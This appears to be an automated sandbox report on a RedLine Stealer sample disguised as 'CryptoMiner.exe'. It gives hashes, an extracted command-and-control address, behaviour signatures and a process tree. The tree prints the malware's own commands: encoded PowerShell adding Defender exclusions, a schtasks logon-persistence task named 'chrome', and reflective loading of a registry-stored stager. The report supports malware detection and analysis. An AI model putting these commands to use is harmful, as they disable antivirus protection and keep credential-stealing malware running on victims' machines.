Analysis
-
max time kernel
123s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
05-05-2022 01:28
General
-
Target
CryptoMiner.exe
-
Size
1.5MB
-
MD5
310eb5bd45ac9c5767d28e63ab64635b
-
SHA1
4ac0d40abb71e9fcff34c8f67511fc590f495f3e
-
SHA256
d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6
-
SHA512
c2b0c3e890bb92f527960230c97c9c75ce50a2b9c4186c1dea87f7e55892702ac82805e5a038b8d32614790357c3ad113afe63e7f77cc99866801f4fdbac5e97
Malware Config
Extracted
redline
@watercloudrobot - oblako za 8500
65.21.213.209:32936
-
auth_value
a14b52bba3a0ad35d4f66edae1132d42
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 2 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Windows directory 4 IoCs
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 8 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d566b413-bc52-4df8-a4c0-8fc359aeb1cf}2⤵
-
C:\Users\Admin\AppData\Local\Temp\CryptoMiner.exe"C:\Users\Admin\AppData\Local\Temp\CryptoMiner.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\fname.exe"C:\Users\Admin\AppData\Local\Temp\fname.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\filename.exe"C:\Users\Admin\AppData\Local\Temp\filename.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\nslookup.exeC:\Windows\System32\nslookup.exe4⤵
- Drops file in Windows directory
-
C:\Windows\system32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\system32\taskeng.exetaskeng.exe {E043FF40-DDB2-4BF0-BE75-9884480F5CDE} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\filename.exeFilesize
4.7MB
MD5c108ebdd14a2cf40e64411792987796a
SHA148f4f5376d0a571784fa03f89015c6a72f74998d
SHA256f9bff1ac8e6c15dde928e87a8bf733006ca805d42302387b2c24e11e555b7ee6
SHA512cfe4079d70f380ad98cc44cd9f05500ff8af79421ea32012b873425bbf045d2da8f9b7942941655fabb64e66d6cebddd174fa4c3c3c3abc54b120cad6e261e07
-
C:\Users\Admin\AppData\Local\Temp\filename.exeFilesize
4.7MB
MD5c108ebdd14a2cf40e64411792987796a
SHA148f4f5376d0a571784fa03f89015c6a72f74998d
SHA256f9bff1ac8e6c15dde928e87a8bf733006ca805d42302387b2c24e11e555b7ee6
SHA512cfe4079d70f380ad98cc44cd9f05500ff8af79421ea32012b873425bbf045d2da8f9b7942941655fabb64e66d6cebddd174fa4c3c3c3abc54b120cad6e261e07
-
C:\Users\Admin\AppData\Local\Temp\fname.exeFilesize
3.5MB
MD5c61f9a9059f8b8bd0e69f7df4cb09786
SHA170fffde0debf4559859617d49dc48c54df3c156d
SHA25684a5a26f1748c3ad1f0b98c438908e8dc842eacc6390484527ee1fe7e56264f5
SHA5126a838d9663517e1f89bf47f9ba85b72cd431f0d61c4db97e69516ffa313d8bdfc9f619eb51ead5215786e523b43cde3186300cf3bfab7408d580c66cd7d00453
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD59e62d99a8b31cae11c418c0cd77b871d
SHA1a14fbfd36d479c2b9ddbf7f2bd771bdc100e28d5
SHA2565dad1628a2f5504f39715c5e7e9452f057e739f631b8bdbef74ea3a5fab27002
SHA512277d5e8c290a0515a228aa2f5668da58ed460d381a22bc3b89022fc75e3d642d001779ec6f921596ec9a2d215f8f1ca9d19c4c1698984ead0eb8fa37aa8483b3
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Users\Admin\AppData\Local\Temp\filename.exeFilesize
4.7MB
MD5c108ebdd14a2cf40e64411792987796a
SHA148f4f5376d0a571784fa03f89015c6a72f74998d
SHA256f9bff1ac8e6c15dde928e87a8bf733006ca805d42302387b2c24e11e555b7ee6
SHA512cfe4079d70f380ad98cc44cd9f05500ff8af79421ea32012b873425bbf045d2da8f9b7942941655fabb64e66d6cebddd174fa4c3c3c3abc54b120cad6e261e07
-
\Users\Admin\AppData\Local\Temp\fname.exeFilesize
3.5MB
MD5c61f9a9059f8b8bd0e69f7df4cb09786
SHA170fffde0debf4559859617d49dc48c54df3c156d
SHA25684a5a26f1748c3ad1f0b98c438908e8dc842eacc6390484527ee1fe7e56264f5
SHA5126a838d9663517e1f89bf47f9ba85b72cd431f0d61c4db97e69516ffa313d8bdfc9f619eb51ead5215786e523b43cde3186300cf3bfab7408d580c66cd7d00453
-
memory/424-148-0x00000000003C0000-0x00000000003E3000-memory.dmpFilesize
140KB
-
memory/684-102-0x000007FEEC3B0000-0x000007FEECDD3000-memory.dmpFilesize
10.1MB
-
memory/684-106-0x000000000277B000-0x000000000279A000-memory.dmpFilesize
124KB
-
memory/684-99-0x0000000000000000-mapping.dmp
-
memory/684-104-0x0000000002774000-0x0000000002777000-memory.dmpFilesize
12KB
-
memory/684-103-0x000007FEEB850000-0x000007FEEC3AD000-memory.dmpFilesize
11.4MB
-
memory/968-95-0x000007FEEC1F0000-0x000007FEECD4D000-memory.dmpFilesize
11.4MB
-
memory/968-94-0x000007FEECD50000-0x000007FEED773000-memory.dmpFilesize
10.1MB
-
memory/968-92-0x0000000000000000-mapping.dmp
-
memory/968-96-0x0000000002674000-0x0000000002677000-memory.dmpFilesize
12KB
-
memory/968-93-0x000007FEFB751000-0x000007FEFB753000-memory.dmpFilesize
8KB
-
memory/968-97-0x000000001B700000-0x000000001B9FF000-memory.dmpFilesize
3.0MB
-
memory/968-98-0x000000000267B000-0x000000000269A000-memory.dmpFilesize
124KB
-
memory/1104-91-0x0000000000000000-mapping.dmp
-
memory/1556-68-0x0000000000000000-mapping.dmp
-
memory/1556-72-0x0000000000D90000-0x000000000110E000-memory.dmpFilesize
3.5MB
-
memory/1556-71-0x0000000000D90000-0x000000000110E000-memory.dmpFilesize
3.5MB
-
memory/1556-73-0x0000000000D90000-0x000000000110E000-memory.dmpFilesize
3.5MB
-
memory/1660-75-0x0000000000000000-mapping.dmp
-
memory/1660-89-0x000000013F610000-0x000000013FABC000-memory.dmpFilesize
4.7MB
-
memory/1660-90-0x000000001BF90000-0x000000001C41C000-memory.dmpFilesize
4.5MB
-
memory/1664-85-0x000000000041CE46-mapping.dmp
-
memory/1664-78-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/1664-86-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/1664-87-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/1664-80-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/1792-142-0x0000000076D30000-0x0000000076ED9000-memory.dmpFilesize
1.7MB
-
memory/1792-138-0x00000001400024C8-mapping.dmp
-
memory/1792-137-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/1792-140-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/1792-147-0x0000000076D30000-0x0000000076ED9000-memory.dmpFilesize
1.7MB
-
memory/1792-143-0x0000000076B10000-0x0000000076C2F000-memory.dmpFilesize
1.1MB
-
memory/1792-145-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/1824-124-0x0000000000000000-mapping.dmp
-
memory/1936-55-0x0000000000BD0000-0x0000000000D55000-memory.dmpFilesize
1.5MB
-
memory/1936-54-0x00000000009A0000-0x0000000000AD6000-memory.dmpFilesize
1.2MB
-
memory/1936-58-0x000000000B920000-0x000000000BA41000-memory.dmpFilesize
1.1MB
-
memory/1936-57-0x00000000757C1000-0x00000000757C3000-memory.dmpFilesize
8KB
-
memory/1936-56-0x00000000009A0000-0x0000000000AD6000-memory.dmpFilesize
1.2MB
-
memory/1940-123-0x0000000000000000-mapping.dmp
-
memory/1972-114-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/1972-108-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/1972-119-0x0000000140002348-mapping.dmp
-
memory/1972-121-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/1972-117-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/1972-115-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/1972-125-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/1972-113-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/1972-112-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/1972-107-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/1972-110-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/1972-118-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/1980-65-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/1980-61-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/1980-63-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/1980-59-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/1988-134-0x000000006EC90000-0x000000006F23B000-memory.dmpFilesize
5.7MB
-
memory/1988-127-0x0000000000000000-mapping.dmp
-
memory/2000-136-0x0000000076B10000-0x0000000076C2F000-memory.dmpFilesize
1.1MB
-
memory/2000-135-0x0000000076D30000-0x0000000076ED9000-memory.dmpFilesize
1.7MB
-
memory/2000-132-0x000007FEEC1F0000-0x000007FEECD4D000-memory.dmpFilesize
11.4MB
-
memory/2000-144-0x0000000076D30000-0x0000000076ED9000-memory.dmpFilesize
1.7MB
-
memory/2000-146-0x0000000076B10000-0x0000000076C2F000-memory.dmpFilesize
1.1MB
-
memory/2000-133-0x00000000012F4000-0x00000000012F7000-memory.dmpFilesize
12KB
-
memory/2000-131-0x000007FEECD50000-0x000007FEED773000-memory.dmpFilesize
10.1MB
-
memory/2000-126-0x0000000000000000-mapping.dmp
-
memory/2000-141-0x00000000012FB000-0x000000000131A000-memory.dmpFilesize
124KB